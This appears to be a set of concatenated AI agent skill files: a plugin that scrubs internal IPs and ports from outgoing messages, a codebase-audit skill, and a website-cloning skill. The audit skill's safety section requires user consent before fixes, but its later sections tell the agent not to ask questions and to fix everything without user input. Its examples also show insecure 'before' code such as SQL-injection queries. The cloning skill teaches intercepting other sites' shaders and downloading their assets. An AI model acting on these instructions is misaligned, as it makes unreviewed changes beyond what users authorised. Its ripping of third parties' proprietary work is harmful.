scrubbed without actually redacting | | `allowedRecipients` | string[] | [] | Chat IDs where scrubbing is skipped (e.g., private DMs with yourself) | ## Example **Before scrubbing:** > SSH into [email protected] and check the service on localhost:8096 **After scrubbing:** > SSH into [redacted-target] and check the service on [redacted-service] FILE:index.ts import type { OpenClawPluginApi } from "openclaw/plugin-sdk"; type ContentScrubberConfig = { dryRun?: boolean; allowedRecipients?: string[]; }; type ScrubRule = { name: string; pattern: RegExp; replacement: string; }; const RULES: ScrubRule[] = [ // SSH/SCP targets — must come before generic RFC 1918 to catch user@host patterns { name: "ssh-scp-target", pattern: /\b\w+@(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3}|127\.\d{1,3}\.\d{1,3}\.\d{1,3})(?::\S+)?/g, replacement: "[redacted-target]", }, // localhost with port { name: "localhost-port", pattern: /\blocalhost:\d+/g, replacement: "[redacted-service]", }, // bare localhost { name: "localhost-bare", pattern: /\blocalhost\b/g, replacement: "[redacted-service]", }, // hostname "clawdbot" { name: "hostname", pattern: /\bclawdbot\b/gi, replacement: "[redacted-host]", }, // RFC 1918 + loopback IPv4 { name: "rfc1918-ip", pattern: /\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3}|127\.\d{1,3}\.\d{1,3}\.\d{1,3})\b/g, replacement: "[redacted-ip]", }, // "port NNNNN" references { name: "port-reference", pattern: /\bport\s+\d{4,5}\b/gi, replacement: "port [redacted]", }, // known internal ports in URLs (colon + port number) { name: "known-port", pattern: /:(?:5201|5202|5204|8005|11434|18789)\b/g, replacement: ":[redacted]", }, ]; export default function register(api: OpenClawPluginApi) { const cfg = (api.pluginConfig ?? {}) as ContentScrubberConfig; const dryRun = cfg.dryRun === true; const allowed = new Set(cfg.allowedRecipients ?? []); api.logger.info( `content-scrubber: Loaded with RULES.length built-in rules""allowed.size ? `, ${allowed.size allowed recipient(s)` : ""}`, ); api.on("message_sending", async (event, ctx) => { const text = event.content; if (!text) return; // Skip scrubbing for allowed recipients (e.g. owner DMs) if (event.to && allowed.has(event.to)) return; const counts: Record<string, number> = {}; let scrubbed = text; for (const rule of RULES) { // Reset lastIndex for global regexps reused across calls rule.pattern.lastIndex = 0; const matches = scrubbed.match(rule.pattern); if (matches && matches.length > 0) { counts[rule.name] = matches.length; scrubbed = scrubbed.replace(rule.pattern, rule.replacement); } } const totalMatches = Object.values(counts).reduce((sum, n) => sum + n, 0); if (totalMatches === 0) return; const breakdown = Object.entries(counts) .map(([name, n]) => `name=n`) .join(", "); const target = ctx.channelId ?? "unknown"; if (dryRun) { api.logger.warn( `content-scrubber: [DRY-RUN] Would scrub totalMatches match(es) [breakdown] → target`, ); return; } api.logger.info( `content-scrubber: Scrubbed totalMatches match(es) [breakdown] → target`, ); return { content: scrubbed }; }); } FILE:openclaw.plugin.json { "id": "content-scrubber", "name": "Content Scrubber", "description": "Scrubs internal infrastructure details (IPs, ports, hostnames) from outgoing messages before delivery", "configSchema": { "type": "object", "additionalProperties": false, "properties": { "dryRun": { "type": "boolean" }, "allowedRecipients": { "type": "array", "items": { "type": "string" } } } } } FILE:package.json { "name": "content-scrubber", "version": "1.0.0", "private": true, "description": "Scrubs internal infrastructure details (IPs, ports, hostnames) from outgoing messages", "openclaw": { "extensions": ["./index.ts"] } }
Deep-scan a codebase, understand its architecture and patterns, then produce a comprehensive audit report with prioritized fixes. Optionally apply changes on...
---
name: production-code-audit
version: 1.1.0
description: "Deep-scan a codebase, understand its architecture and patterns, then produce a comprehensive audit report with prioritized fixes. Optionally apply changes on a feature branch with a PR for review. Covers security, performance, error handling, logging, testing, and documentation."
---
# Production Code Audit
## Overview
Analyze a codebase to understand its architecture, patterns, and purpose, then produce a detailed audit report with prioritized findings. Optionally apply fixes on a dedicated branch for review via pull request. This skill scans for issues across security, performance, architecture, and quality.
## Safety & Workflow
> **Important:** This skill operates in two modes:
> 1. **Audit mode (default):** Read-only scan that produces a report. No files are modified.
> 2. **Fix mode:** When the user explicitly requests fixes, create a new branch (e.g., `audit/production-hardening`), apply changes there, and open a draft PR for review. Never push directly to main.
>
> **Secrets handling:** If hardcoded secrets are discovered, flag them in the report with file and line number. Do NOT remove or commit secrets. Advise the user to rotate the credential and use environment variables. Never log or exfiltrate secret values.
>
> **Test execution:** Only run tests in a sandboxed or CI environment. Ask the user before executing tests locally if the project has external dependencies (databases, APIs, etc.).
## When to Use This Skill
- Use when user says "audit my codebase" or "make this production-ready"
- Use when preparing for production deployment
- Use when code needs to meet corporate/enterprise standards
## How It Works
### Step 1: Codebase Discovery
**Scan and understand the codebase:**
1. **Read source files** - Scan project files (respect .gitignore, skip node_modules/vendor/dist)
2. **Identify tech stack** - Detect languages, frameworks, databases, tools
3. **Understand architecture** - Map out structure, patterns, dependencies
4. **Identify purpose** - Understand what the application does
5. **Find entry points** - Locate main files, routes, controllers
6. **Map data flow** - Understand how data moves through the system
### Step 2: Comprehensive Issue Detection
**Scan line-by-line for all issues:**
**Architecture Issues:**
- Circular dependencies
- Tight coupling
- God classes (>500 lines or >20 methods)
- Missing separation of concerns
- Poor module boundaries
- Violation of design patterns
**Security Vulnerabilities:**
- SQL injection (string concatenation in queries)
- XSS vulnerabilities (unescaped output)
- Hardcoded secrets (API keys, passwords in code)
- Missing authentication/authorization
- Weak password hashing (MD5, SHA1)
- Missing input validation
- CSRF vulnerabilities
- Insecure dependencies
**Performance Problems:**
- N+1 query problems
- Missing database indexes
- Synchronous operations that should be async
- Missing caching
- Inefficient algorithms (O(n²) or worse)
- Large bundle sizes
- Unoptimized images
- Memory leaks
**Code Quality Issues:**
- High cyclomatic complexity (>10)
- Code duplication
- Magic numbers
- Poor naming conventions
- Missing error handling
- Inconsistent formatting
- Dead code
- TODO/FIXME comments
**Testing Gaps:**
- Missing tests for critical paths
- Low test coverage (<80%)
- No edge case testing
- Flaky tests
- Missing integration tests
**Production Readiness:**
- Missing environment variables
- No logging/monitoring
- No error tracking
- Missing health checks
- Incomplete documentation
- No CI/CD pipeline
### Step 3: Fixes and Optimizations (Fix Mode Only)
**When the user explicitly requests fixes, apply them on a new branch:**
```bash
git checkout -b audit/production-hardening
```
1. **Refactor architecture** - Break up god classes, fix circular dependencies
2. **Fix security issues** - Use parameterized queries, flag secrets for rotation, add validation
3. **Optimize performance** - Fix N+1 queries, add caching, optimize algorithms
4. **Improve code quality** - Reduce complexity, remove duplication, fix naming
5. **Add missing tests** - Write tests for untested critical paths
6. **Add production infrastructure** - Logging, monitoring, health checks
7. **Optimize everything** - Bundle size, images, database queries
8. **Add documentation** - README, API docs, architecture docs
### Step 4: Verify and Report
**After making all changes:**
1. Run all tests to ensure nothing broke
2. Verify all security issues are fixed
3. Measure performance improvements
4. Generate comprehensive report
5. Provide before/after metrics
## Examples
### Example 1: Autonomous Codebase Transformation
```markdown
User: @production-code-audit make this production-ready
AI: I'll scan your entire codebase and transform it to production-grade quality.
**Phase 1: Discovering Codebase** (analyzing 247 files)
- Detected: Node.js + Express + PostgreSQL + React
- Architecture: MVC pattern with REST API
- Purpose: E-commerce platform
- Entry points: server.js, src/index.tsx
**Phase 2: Scanning for Issues** (line-by-line analysis)
Found 127 issues:
- 🔴 CRITICAL: 8 issues
- 🟠 HIGH: 23 issues
- 🟡 MEDIUM: 41 issues
- 🔵 LOW: 55 issues
**Phase 3: Fixing Issues Automatically**
🔴 CRITICAL FIXES (8/8 completed):
1. ✅ Fixed SQL injection in UserRepository.findByEmail()
- Before: String concatenation in query
- After: Parameterized query with $1 placeholder
2. ✅ Removed hardcoded database password from config/database.ts
- Before: password: 'SuperSecret123!'
- After: password: process.env.DB_PASSWORD
3. ✅ Added authentication to admin routes
- Before: No auth middleware
- After: authenticateToken + requireRole('admin')
4. ✅ Fixed weak password hashing (MD5 → bcrypt)
- Before: crypto.createHash('md5')
- After: bcrypt.hash(password, 12)
5. ✅ Fixed circular dependency: OrderService ↔ PaymentService
- Before: Direct imports causing cycle
- After: Event-based decoupling with EventBus
6. ✅ Added input validation to all API endpoints
- Before: No validation
- After: Zod schemas validating all inputs
7. ✅ Fixed authentication bypass in auth middleware
- Before: next() called on missing token
- After: Returns 401 error
8. ✅ Fixed mass assignment vulnerability in UserController
- Before: Accepts all fields from req.body
- After: Whitelist of allowed fields only
🟠 HIGH PRIORITY FIXES (23/23 completed):
9. ✅ Fixed N+1 query in OrderService.getOrdersWithItems()
- Before: Loop with individual queries (2.8s)
- After: Single query with joins (45ms)
- Performance: 98% improvement
10. ✅ Refactored UserService god class (850 lines → 4 focused services)
- UserAuthenticationService (login, logout, password)
- UserProfileService (CRUD operations)
- UserNotificationService (email, SMS)
- UserPermissionService (roles, permissions)
11. ✅ Added Redis caching for product queries
- Before: Database query every request
- After: Cache with 1-hour TTL
- Performance: 95% faster
12. ✅ Optimized bundle size
- Before: 850KB (gzipped: 280KB)
- After: 380KB (gzipped: 120KB)
- Improvement: 55% reduction
13. ✅ Added database indexes
- orders(user_id, status, created_at)
- products(category, price)
- Query performance: 98% improvement
[... 11 more high-priority fixes ...]
🟡 MEDIUM PRIORITY FIXES (41/41 completed):
[... all medium fixes ...]
🔵 LOW PRIORITY IMPROVEMENTS (55/55 completed):
[... all low improvements ...]
**Phase 4: Adding Production Infrastructure**
✅ Added structured logging (Winston)
✅ Added error tracking (Sentry)
✅ Added health check endpoints (/health, /ready)
✅ Added monitoring (Prometheus metrics)
✅ Added rate limiting (Redis-based)
✅ Added API documentation (Swagger/OpenAPI)
✅ Added comprehensive README
✅ Added deployment guide
✅ Added CI/CD pipeline (.github/workflows)
**Phase 5: Verification**
✅ All tests passing (1,247 tests)
✅ Test coverage: 42% → 87%
✅ Security scan: 0 vulnerabilities
✅ Performance: API response time 3.2s → 180ms
✅ Bundle size: 850KB → 380KB
✅ Lighthouse score: 62 → 94
**TRANSFORMATION COMPLETE**
Your codebase is now production-ready with enterprise-grade quality:
📊 Metrics:
- Issues fixed: 127/127 (100%)
- Test coverage: 87% (target: 80%+)
- API performance: 94% improvement
- Security: OWASP Top 10 compliant
- Code quality: Grade A-
📁 Files changed: 89 files
📝 Lines changed: +3,247 / -1,892
🚀 Ready for production deployment!
```
### Example 2: Automatic Security Hardening
```markdown
User: @production-code-audit secure this codebase
AI: Scanning for security vulnerabilities...
**Security Scan Complete**
Found 15 security issues:
- 🔴 CRITICAL: 5
- 🟠 HIGH: 7
- 🟡 MEDIUM: 3
**Fixing all security issues automatically...**
🔴 CRITICAL (5/5 fixed):
1. ✅ SQL Injection in UserRepository
\`\`\`typescript
// Before (VULNERABLE)
const query = \`SELECT * FROM users WHERE email = '\email'\`;
// After (SECURE)
const query = 'SELECT * FROM users WHERE email = $1';
await db.query(query, [email]);
\`\`\`
2. ✅ Hardcoded Secrets Removed
\`\`\`typescript
// Before (INSECURE)
const JWT_SECRET = 'my-secret-key-123';
// After (SECURE)
const JWT_SECRET = process.env.JWT_SECRET;
if (!JWT_SECRET) throw new Error('JWT_SECRET required');
\`\`\`
3. ✅ Authentication Added to Admin Routes
\`\`\`typescript
// Before (VULNERABLE)
router.delete('/api/admin/users/:id', deleteUser);
// After (SECURE)
router.delete('/api/admin/users/:id',
authenticateToken,
requireRole('admin'),
deleteUser
);
\`\`\`
4. ✅ Password Hashing Upgraded
\`\`\`typescript
// Before (WEAK)
const hash = crypto.createHash('md5').update(password).digest('hex');
// After (STRONG)
const hash = await bcrypt.hash(password, 12);
\`\`\`
5. ✅ Input Validation Added
\`\`\`typescript
// Before (VULNERABLE)
const user = await db.user.create({ data: req.body });
// After (SECURE)
const schema = z.object({
email: z.string().email(),
password: z.string().min(12),
name: z.string().min(2).max(100)
});
const validated = schema.parse(req.body);
const user = await db.user.create({ data: validated });
\`\`\`
**Security Status:**
- ✅ OWASP Top 10: Compliant
- ✅ SQL Injection: Protected
- ✅ XSS: Protected
- ✅ CSRF: Protected
- ✅ Authentication: Secure
- ✅ Secrets: Environment variables
- ✅ Dependencies: No vulnerabilities
🔒 Codebase is now secure and production-ready!
```
### Example 3: Performance Optimization
```markdown
User: @production-code-audit optimize performance
AI: Analyzing performance bottlenecks...
**Performance Analysis Complete**
Current metrics:
- API response time: 3.2s (target: <200ms)
- Page load time: 8.5s (target: <2s)
- Bundle size: 850KB (target: <200KB)
**Optimizing automatically...**
✅ Fixed N+1 queries (3.2s → 180ms - 94% faster)
✅ Added Redis caching (95% cache hit rate)
✅ Optimized database indexes (98% faster queries)
✅ Reduced bundle size (850KB → 380KB - 55% smaller)
✅ Optimized images (28MB → 3.2MB - 89% smaller)
✅ Implemented code splitting
✅ Added lazy loading
✅ Parallelized async operations
**Performance Results:**
| Metric | Before | After | Improvement |
|--------|--------|-------|-------------|
| API Response | 3.2s | 180ms | 94% |
| Page Load | 8.5s | 1.8s | 79% |
| Bundle Size | 850KB | 380KB | 55% |
| Image Size | 28MB | 3.2MB | 89% |
| Lighthouse | 42 | 94 | +52 points |
🚀 Performance optimized to production standards!
```
## Best Practices
### ✅ Do This
- **Scan Everything** - Read all files, understand entire codebase
- **Fix Automatically** - Don't just report, actually fix issues
- **Prioritize Critical** - Security and data loss issues first
- **Measure Impact** - Show before/after metrics
- **Verify Changes** - Run tests after making changes
- **Be Comprehensive** - Cover architecture, security, performance, testing
- **Optimize Everything** - Bundle size, queries, algorithms, images
- **Add Infrastructure** - Logging, monitoring, error tracking
- **Document Changes** - Explain what was fixed and why
### ❌ Don't Do This
- **Don't Ask Questions** - Understand the codebase autonomously
- **Don't Wait for Instructions** - Scan and fix automatically
- **Don't Report Only** - Actually make the fixes
- **Don't Skip Files** - Scan every file in the project
- **Don't Ignore Context** - Understand what the code does
- **Don't Break Things** - Verify tests pass after changes
- **Don't Be Partial** - Fix all issues, not just some
## Autonomous Scanning Instructions
**When this skill is invoked, automatically:**
1. **Discover the codebase:**
- Use `listDirectory` to find all files recursively
- Use `readFile` to read every source file
- Identify tech stack from package.json, requirements.txt, etc.
- Map out architecture and structure
2. **Scan line-by-line for issues:**
- Check every line for security vulnerabilities
- Identify performance bottlenecks
- Find code quality issues
- Detect architectural problems
- Find missing tests
3. **Fix everything automatically:**
- Use `strReplace` to fix issues in files
- Add missing files (tests, configs, docs)
- Refactor problematic code
- Add production infrastructure
- Optimize performance
4. **Verify and report:**
- Run tests to ensure nothing broke
- Measure improvements
- Generate comprehensive report
- Show before/after metrics
**Do all of this without asking the user for input.**
## Common Pitfalls
### Problem: Too Many Issues
**Symptoms:** Team paralyzed by 200+ issues
**Solution:** Focus on critical/high priority only, create sprints
### Problem: False Positives
**Symptoms:** Flagging non-issues
**Solution:** Understand context, verify manually, ask developers
### Problem: No Follow-Up
**Symptoms:** Audit report ignored
**Solution:** Create GitHub issues, assign owners, track in standups
## Production Audit Checklist
### Security
- [ ] No SQL injection vulnerabilities
- [ ] No hardcoded secrets
- [ ] Authentication on protected routes
- [ ] Authorization checks implemented
- [ ] Input validation on all endpoints
- [ ] Password hashing with bcrypt (10+ rounds)
- [ ] HTTPS enforced
- [ ] Dependencies have no vulnerabilities
### Performance
- [ ] No N+1 query problems
- [ ] Database indexes on foreign keys
- [ ] Caching implemented
- [ ] API response time < 200ms
- [ ] Bundle size < 200KB (gzipped)
### Testing
- [ ] Test coverage > 80%
- [ ] Critical paths tested
- [ ] Edge cases covered
- [ ] No flaky tests
- [ ] Tests run in CI/CD
### Production Readiness
- [ ] Environment variables configured
- [ ] Error tracking setup (Sentry)
- [ ] Structured logging implemented
- [ ] Health check endpoints
- [ ] Monitoring and alerting
- [ ] Documentation complete
## Audit Report Template
```markdown
# Production Audit Report
**Project:** [Name]
**Date:** [Date]
**Overall Grade:** [A-F]
## Executive Summary
[2-3 sentences on overall status]
**Critical Issues:** [count]
**High Priority:** [count]
**Recommendation:** [Fix timeline]
## Findings by Category
### Architecture (Grade: [A-F])
- Issue 1: [Description]
- Issue 2: [Description]
### Security (Grade: [A-F])
- Issue 1: [Description + Fix]
- Issue 2: [Description + Fix]
### Performance (Grade: [A-F])
- Issue 1: [Description + Fix]
### Testing (Grade: [A-F])
- Coverage: [%]
- Issues: [List]
## Priority Actions
1. [Critical issue] - [Timeline]
2. [High priority] - [Timeline]
3. [High priority] - [Timeline]
## Timeline
- Critical fixes: [X weeks]
- High priority: [X weeks]
- Production ready: [X weeks]
```
## Related Skills
- `@code-review-checklist` - Code review guidelines
- `@api-security-best-practices` - API security patterns
- `@web-performance-optimization` - Performance optimization
- `@systematic-debugging` - Debug production issues
- `@senior-architect` - Architecture patterns
## Additional Resources
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)
- [Google Engineering Practices](https://google.github.io/eng-practices/)
- [SonarQube Quality Gates](https://docs.sonarqube.org/latest/user-guide/quality-gates/)
- [Clean Code by Robert C. Martin](https://www.amazon.com/Clean-Code-Handbook-Software-Craftsmanship/dp/0132350882)
---
**Pro Tip:** Schedule regular audits (quarterly) to maintain code quality. Prevention is cheaper than fixing production bugs!
High-fidelity visual-first web rebuilding from design references. Screenshot-driven analysis, DOM interrogation for exact CSS values, asset inspection (WebGL...
---
name: clone-anywebsite
description: "High-fidelity visual-first web rebuilding from design references. Screenshot-driven analysis, DOM interrogation for exact CSS values, asset inspection (WebGL, SVGs, fonts), and React/Tailwind componentization. Useful for rebuilding your own sites, learning from design patterns, or prototyping from references you have rights to."
author: SylphAI-Inc
version: 1.0.0
---
# Guide: Visual-First Web Cloning Recipe
> **Legal Notice:** This skill is intended for cloning your own websites, building from design references you have rights to, or learning from public design patterns. Always ensure you have permission before reproducing third-party designs, assets, or branding. Respect copyright, trademarks, and terms of service.
When building a high-fidelity landing page clone, the biggest trap is relying purely on DOM trees and CSS dumps. Modern website builders (Framer, Webflow) generate deeply nested "div soup" and obfuscated CSS to create visual effects.
**The Golden Rule:** Trust your "eyes" (screenshots) first, but when an effect looks too complex to be pure CSS, use **Deep DOM Interrogation** to steal the exact asset.
## The 80/20 Cloning Philosophy
To clone efficiently, you must divide your workflow into two distinct phases so you don't get bogged down pixel-pushing too early:
1. **The 80% Sprint (Speed & Structure):** Get the page laid out rapidly. Use Steps 0-2 to fetch the semantic HTML, scaffold the React component tree (`Navbar`, `Hero`, `Features`), and apply basic Tailwind classes for layout (Flex/Grid) and spacing. Accept approximations here—use solid colors instead of complex gradients, standard CSS shadows, and static backgrounds. **Move fast.**
2. **The 20% Polish (Pixel Perfection & Physics):** Once the 80% structure is on screen, shift gears to meticulous engineering. Use Steps 3-5 to steal the exact math. This is where you use "Sniper CSS" to extract exact multi-stop gradients, rip WebGL canvas backgrounds to `.webm` videos, map massive multi-layer box-shadows, and implement Framer Motion spring physics.
---
## The 6-Step "Visual-First" Recipe
### Step 0: Codebase Scaffolding Strategy
Before writing code, establish a scalable folder structure. Modern landing pages should be componentized.
* **`src/components/layout/`**: `Navbar.tsx`, `Footer.tsx` (Global elements)
* **`src/components/sections/`**: `Hero.tsx`, `Features.tsx`, `Testimonials.tsx` (Page blocks)
* **`src/components/ui/`**: `Button.tsx`, `GlassCard.tsx` (Reusable micro-components)
* **`src/assets/media/`**: Local storage for extracted videos, noise overlays, and icons.
### Step 1: The "Eye Test" (Visual Grounding)
**Before looking at a single line of code, visually ground yourself in the reference site.**
1. **Capture:** Navigate to the target site and take a screenshot using an absolute path.
`mcp_chrome-devtools_take_screenshot(filePath="/absolute/path/to/ref.png")`
2. **Analyze:** Read the image (using your read image tool) and actively identify the *Vibe*:
- **Backgrounds:** Is it flat? A subtle radial gradient? Are there sweeping SVG waves or floating blurred orbs?
- **Buttons:** Are they flat? Glassmorphic (backdrop-blur)? Do they have glowing auras?
- **Typography:** Which specific words are highlighted? Are there gradient text clips?
### Step 2: Macro Structure Capture (Playwright/DOM Snapshot)
*Best for: Getting the general layout semantic HTML structure (Nav, Hero, Bento Grid, Footer).*
- Take a DOM text snapshot using Chrome DevTools or Playwright to understand the section-by-section flow and extract the actual copy/text.
- **Do not blindly copy the DOM.** Distill the complicated nested builder divs into clean, semantic React (e.g., `<section>`, `<nav>`, `<ul>`).
### Step 3: Micro Extraction (Sniper CSS)
*Best for: Extracting exact pixel-perfect design tokens during the 20% Polish.*
**Tool to use:** `mcp_chrome-devtools_evaluate_script`
**Do NOT query the full `getComputedStyle` object.** It returns 500+ properties, overwhelms the context window, and creates hallucination/confusion. Instead, use targeted JS payloads to extract exactly what you need.
**Script 1: Typography Tokens (Fonts, Spacing, Weights)**
*Why: To perfectly match headings. Used to discover that Calisto's H1 used `-4.8px` letter spacing and specific gray/blue hex colors.*
```javascript
() => {
const el = document.querySelector('h1');
const s = window.getComputedStyle(el);
return JSON.stringify({
color: s.color,
fontSize: s.fontSize,
fontWeight: s.fontWeight,
letterSpacing: s.letterSpacing,
lineHeight: s.lineHeight
}, null, 2);
}
```
**Script 2: Bounding Box & Overflow (The Glow/Shadow Check)**
*Why: To find exact dimensions and see if glowing effects bleed outside the element. We used this to realize the Hero button was exactly 160x160px with `overflow: visible`, allowing inner conic gradients to blur outside the borders.*
```javascript
() => {
const btn = Array.from(document.querySelectorAll('a')).find(l => l.textContent.includes('Get Started'));
if (!btn) return "Not found";
const rect = btn.getBoundingClientRect();
const s = window.getComputedStyle(btn);
return JSON.stringify({
width: rect.width,
height: rect.height,
display: s.display,
borderRadius: s.borderRadius,
overflow: s.overflow,
boxShadow: s.boxShadow
}, null, 2);
}
```
**Script 3: Glassmorphism & Backgrounds**
*Why: To grab exact transparency, blur, and gradient values for navbars or cards.*
```javascript
() => {
const el = document.querySelector('nav');
const s = window.getComputedStyle(el);
return JSON.stringify({
background: s.background,
backdropFilter: s.backdropFilter,
border: s.border
}, null, 2);
}
```
**Script 4: Typography & Forced Line-Breaks**
*Why: A clone looks instantly fake if text wraps differently than the original. Don't let the browser decide fluidly. Extract exact container widths to force identical line breaks.*
```javascript
() => {
const el = document.querySelector('h1');
const r = el.getBoundingClientRect();
return JSON.stringify({
containerMaxWidth: r.width // Use this in Tailwind (e.g., max-w-[900px]) to force exact wraps!
}, null, 2);
}
```
**Script 5: Abstract Glows & "Orbits" (The Glow Fallacy)**
*Why: A common trap is seeing a background aura and guessing it's a simple radial gradient with a massive `blur()`. High-end templates actually use hard shapes, multi-stop linear gradients, precise matrix transforms (rotations), and specific blend modes with a very tight blur. Eyeballing this turns a sharp "galaxy arm" into a muddy blob.*
```javascript
() => {
const el = document.querySelector('[data-framer-name="Big Circle"]');
if (!el) return "Not found";
const s = window.getComputedStyle(el);
return JSON.stringify({
background: s.background, // Captures complex multi-stop gradients
transform: s.transform, // Captures crucial rotation angles
filter: s.filter, // Captures the exact, often surprisingly small, blur
opacity: s.opacity
}, null, 2);
}
```
### Step 4: Deep DOM Interrogation (The Secret Sauce)
*Best for: Replicating complex glows, overlapping animations, and fluid backgrounds.*
When an effect (like a smooth background or a swirling button) is too complex, **do not guess the math**. Framer and Webflow hide these in layered divs, pseudo-elements, or literal `<video>`/`<canvas>` tags.
**Script 1: Render Engine Identification (Video vs Canvas vs CSS)**
If the background is moving fluidly, you must determine *what* is rendering it before trying to clone it. Find the full-screen background node:
```javascript
() => {
const backgrounds = [];
document.querySelectorAll('*').forEach(el => {
const style = window.getComputedStyle(el);
const rect = el.getBoundingClientRect();
// Look for large elements spanning >80% of screen in the background
if ((style.position === 'fixed' || style.position === 'absolute') &&
(parseInt(style.zIndex) <= 0 || style.zIndex === 'auto') &&
rect.width >= window.innerWidth * 0.8 &&
rect.height >= window.innerHeight * 0.5 &&
el.tagName !== 'BODY' && el.tagName !== 'HTML') {
backgrounds.push({ tag: el.tagName, html: el.outerHTML.substring(0, 300) });
}
});
return JSON.stringify(backgrounds, null, 2);
}
```
*Lesson:* The DOM never lies. You might discover the "complex animation" is actually:
1. **A Video:** A `<video src="...mp4">` tag (like in the Calisto template). *Solution: Extract the URL and drop it in.*
2. **A WebGL Canvas:** A `<canvas data-paper-shaders="true">` tag (like in the Portfolite template). *Solution: Do not hack CSS. Scaffold React Three Fiber and write a GLSL shader. See Script 3.*
3. **A Noise Overlay:** A repeating film-grain image (`background-image: url(...noise.png)`) at 5-10% opacity layered over the effect to prevent color banding.
**Script 2: Deep Extraction for UI Micro-Components (`outerHTML`)**
To clone a complex modern button or pill badge, do not guess the CSS. Builders use massive multi-layered `box-shadow` strings (e.g., 6 layers of shadow) and precise `rgba` borders to create glowing depth. Extract its literal nested structure:
```javascript
() => {
const btn = Array.from(document.querySelectorAll('a')).find(l => l.textContent.includes('Get Started'));
return btn ? btn.parentElement.outerHTML : 'Not found';
}
```
*Lesson:* This reveals the nested `conic-gradient` divs, `blur()` filters, and massive `box-shadow` arrays. Map those literal strings directly into an arbitrary Tailwind class like `shadow-[0px_0.7px_..._rgba(...)]`.
**Script 3: The API Interceptor (Shader Stealer)**
If the target is using a WebGL `<canvas>`, the exact GLSL shader code is often minified in JS chunks. You can hijack the browser's WebGL API to intercept the raw shader math before it goes to the GPU.
Inject this script *before* the page loads (using `initScript` in `mcp_chrome-devtools_navigate_page`):
```javascript
window.__interceptedShaders = [];
function hookContext(glPrototype) {
if (!glPrototype) return;
const originalShaderSource = glPrototype.shaderSource;
glPrototype.shaderSource = function(shader, source) {
window.__interceptedShaders.push(source);
originalShaderSource.call(this, shader, source);
};
}
hookContext(WebGLRenderingContext.prototype);
if (typeof WebGL2RenderingContext !== 'undefined') hookContext(WebGL2RenderingContext.prototype);
```
Then, evaluate `JSON.stringify(window.__interceptedShaders)` to read the exact GLSL math!
**Script 4: The "Last Resort" Canvas Recorder**
When a WebGL Canvas shader is too heavily obfuscated to intercept (or relies on proprietary 3D math engines), do not try to guess the GLSL math. Instead, literally record the GPU output directly from the reference site and use it as a seamless background video.
```javascript
() => {
return new Promise((resolve) => {
const canvas = document.querySelector('canvas');
if (!canvas) return resolve("No canvas found.");
const stream = canvas.captureStream(30);
const recorder = new MediaRecorder(stream, { mimeType: 'video/webm' });
const chunks = [];
recorder.ondataavailable = e => { if (e.data.size > 0) chunks.push(e.data); };
recorder.onstop = () => {
const blob = new Blob(chunks, { type: 'video/webm' });
const url = URL.createObjectURL(blob);
const a = document.createElement('a');
a.href = url;
a.download = 'framer_perfect_loop.webm';
document.body.appendChild(a);
a.click(); // Triggers the download
document.body.removeChild(a);
resolve("Recorded 8s and downloaded: framer_perfect_loop.webm");
};
recorder.start();
setTimeout(() => recorder.stop(), 8000); // 8 seconds for a good loop
});
}
```
### Step 5: Synthesis & Rebuild (Tailwind + Framer Motion)
*Best for: Translating visual effects into clean, modern tech stacks.*
1. **Build the Base (The 80%):** Scaffold the structure using Step 2.
2. **Apply Tokens (The 20%):** Plug in the exact colors, typography, and spacing from Step 3.
3. **Entrance Physics (The 20%):** Use `framer-motion` for buttery smooth spring entrances instead of standard CSS transitions.
4. **Recreate the "Vibe":**
- *Videos/Canvas:* Drop the extracted `<video>` tag directly into an absolute background container.
- *Framer Glows/Auras:* Use layered absolute divs with exact gradient/blur tokens.
5. **Verify (The Two-Tab & Stitch Workflow):**
- **Two Tabs:** Keep the reference site and your local clone open in separate MCP browser tabs.
- **CRITICAL - Explicit Page Selection:** When juggling multiple tabs, taking a screenshot without focusing the tab will capture the wrong page or stale state. You MUST follow this exact sequence:
1. `mcp_chrome-devtools_list_pages` to get the `pageId` for both tabs.
2. `mcp_chrome-devtools_select_page(pageId=REF_ID)` to explicitly focus the reference.
3. Take the reference screenshot with an absolute path (`ref_latest.png`).
4. `mcp_chrome-devtools_select_page(pageId=LOCAL_ID)` to explicitly focus your local clone.
5. *(Optional but recommended)* Run `location.reload()` via script if WebGL or HMR is stuck.
6. Take the local screenshot with an absolute path (`local_latest.png`).
- **Side-by-Side Stitching:** Use a quick Python script via your shell tool to stitch them together horizontally for a flawless 1:1 visual comparison:
```bash
python3 -c "
from PIL import Image
i1 = Image.open('/absolute/path/ref.png')
i2 = Image.open('/absolute/path/local.png')
h = min(i1.height, i2.height)
i1 = i1.resize((int(i1.width * h / i1.height), h))
i2 = i2.resize((int(i2.width * h / i2.height), h))
dst = Image.new('RGB', (i1.width + i2.width, h))
dst.paste(i1, (0, 0))
dst.paste(i2, (i1.width, 0))
dst.save('/absolute/path/combined.png')
"
```
- **Read:** Use your read image tool on `combined.png` to spot any remaining visual discrepancies side-by-side.
## Troubleshooting & Best Practices
- **"The background animation is missing!"** -> You assumed it was CSS. Run the Background Media script (Step 4) to find the hidden `<video>` or `<canvas>` tag.
- **"The Button looks totally different!"** -> Extract the `outerHTML` of the button's parent. You likely missed overlapping blurred divs or 6-layer box shadows that create the glow effect.
- **"The Text Wraps Wrong!"** -> You let the browser decide fluidly. Extract the exact bounding box width from the original and hardcode it (`max-w-[...]`).
- **Save Paths:** Always use **Absolute Paths** for saving screenshots to avoid losing them in the MCP server's hidden working directories.
- **Zombie Browsers:** If the DevTools server fails with a lock error, run `pkill -f "chrome-devtools-mcp" || true`.
---
**Ethical/Legal Note:** When cloning websites, ensure you have the appropriate permissions. For learning purposes, focus on reverse-engineering the structural layout and design systems (spacing, colors, typography) rather than ripping proprietary copy, branding, or gated assets.
Deploy MISP threat intelligence platform on any Docker-ready Linux host. Official misp-docker project with automatic MariaDB memory tuning (prevents OOM on s...
